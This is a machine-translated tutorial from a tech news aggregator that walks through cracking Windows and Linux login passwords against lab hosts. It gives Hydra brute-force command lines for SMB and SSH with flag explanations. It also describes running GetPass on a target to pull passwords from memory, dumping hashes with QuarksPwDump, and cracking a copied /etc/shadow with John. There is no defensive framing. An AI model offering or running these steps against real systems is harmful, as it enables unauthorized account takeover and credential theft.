Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to crack Windows and Linux login passwords

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/02 Report--

This article mainly explains "how to crack Windows and Linux login passwords". The explanation content in this article is simple and clear, easy to learn and understand. Please follow the ideas of Xiaobian to study and learn "how to crack Windows and Linux login passwords" together.

1. Windows login password cracking

Target host: win7

IP address: 192.168.1.129

1. Use Hydra for offline cracking

hydra -l administrator -P /root/Desktop/1.txt 192.168.1.129 smb

-l Specify username

-P Develop a blasting dictionary

2. Use GetPass memory to extract password, upload GetPass to target host, and run directly from terminal.

Switch to another account

3. Use QuarksPwDump to get hash value, and then get password through john.

Get hash value, save content to 2.txt

John cracked the password.

Second, Linux login password cracking

Target host: Ubuntu

IP address: 192.168.1.131

1. Use Hydra for offline cracking

hydra -L /root/Desktop/1.txt -P /root/Desktop/2.txt ssh://192.168.1.131 -e nsr -vV -o 3.txt

-L Specify user name dictionary

-P specifies password dictionary

-e null/same Specifies null password and same password probe

-o Save the results

Check the blasting results, you can see the account number and password

2. Use John to blast the login password

Copy the/etc/shadow file to the desktop and blast it with john

View blown passwords

Thank you for reading, the above is "how to crack Windows and Linux login password" content, after the study of this article, I believe everyone on how to crack Windows and Linux login password this problem has a deeper experience, the specific use of the situation also needs to be verified by practice. Here is, Xiaobian will push more articles related to knowledge points for everyone, welcome to pay attention!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Internet Technology

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report